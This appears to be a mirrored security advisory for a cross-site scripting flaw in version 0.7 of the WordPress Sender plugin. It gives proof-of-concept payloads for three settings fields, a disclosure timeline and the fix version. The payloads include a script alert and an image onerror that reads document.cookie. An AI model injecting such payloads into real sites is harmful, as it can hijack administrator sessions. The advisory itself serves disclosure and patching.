https://cxsecurity.com/issue/WLB-2015120200
WordPress Sender 0.7 Cross Site Scripting






漏洞ID | 1040666 | 漏洞类型 | |
发布时间 | 2015-12-18 | 更新时间 | 2015-12-18 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Plugin Name : Sender
Effected Version : 0.7 (and most probably lower version's if any)
Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Madhu Akula
Technical Details
Minimum Level of Access Required : Administrator
PoC - (Proof of Concept) :
The following fields put the payload as below
http://localhost/wp-admin/admin.php?page=sndr_settings&action=go_pro
bws_license_key = ?><img src=x onerror=prompt(document.cookie);>
http://localhost/wp-admin/admin.php?page=sndr_settings
sndr_from_custom_name = ?><script>alert(1)</script>
sndr_from_email = ?><script>alert(2)</script>
Vulnerable Parameter : bws_license_key, sndr_from_custom_name, sndr_from_email
Type of XSS : Reflected / Stored
Fixed in : 0.8
http://wordpress.org/plugins/sender/changelog/
Disclosure Timeline
Vendor Contacted : 2014-08-04
Plugin Status : Updated on 2014-08-07
Public Disclosure : October 3, 2015
CVE Number : Not assigned yet
Plugin Description :
This plugin allows you send mails to all users or to certain categories of users via several clicks. To send letters, you can use the php functions such as sending emails, wordpress functions, or send an email through the SMTP server. Also, the plugin provides a bulk mailing for a certain period of time.
检索漏洞
开始时间
结束时间